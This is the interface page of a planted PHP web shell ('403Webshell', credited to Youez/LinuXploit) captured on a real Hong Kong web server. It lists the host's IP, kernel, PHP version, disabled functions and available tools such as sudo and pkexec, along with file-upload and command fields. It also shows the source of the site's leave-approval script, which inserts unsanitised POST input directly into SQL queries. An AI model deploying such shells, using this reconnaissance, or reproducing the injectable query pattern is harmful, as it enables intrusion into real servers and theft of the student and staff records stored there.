403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)pathways.org.hk/MIS20140127/old20140414/LeaveApplication/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)pathways.org.hk/MIS20140127/old20140414/LeaveApplication/approve_leave.php
<?php

include_once '../include/DBConnect.php';

if ($_POST) {
    $ALID = $_POST['ALID'];
    $TargetName = "";
    $query = "UPDATE `leave_app` SET `is_approved`=1 WHERE `leave_id`='$ALID' and `actived`=1 and `deleted`=0";
    $sth = $dbh->prepare($query);
    $sth->execute();

    $query = "(SELECT CONCAT( last_name,  ' ', first_name,  '(', ch_name,  ')' ) AS name FROM student WHERE deleted =0 and actived =1 
        and root_id = (SELECT `stu_linking_id` FROM `leave_app` WHERE `is_approved`=1 and `leave_id`='$ALID') GROUP BY root_id)
                UNION 
            (SELECT CONCAT( last_name,  ' ', first_name,  '(', ch_name,  ')' ) AS name FROM staff WHERE deleted =0 and actived =1 
            and root_id = (SELECT `staff_id` FROM `leave_app` WHERE `is_approved`=1 and `leave_id`='$ALID') GROUP BY root_id)";
    $result = $dbh->prepare($query);
    $result->execute();
    $approve_result = count($TargetName = $result->fetchAll(PDO::FETCH_ASSOC)) > 0 ? TRUE : FALSE;
//    var_dump($approve_result);
    $Array = array(
        "success" => $approve_result,
        "approve_id" => $ALID,
        "name" => $TargetName
    );
    $Arrays[] = $Array;
}

echo json_encode($Arrays);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit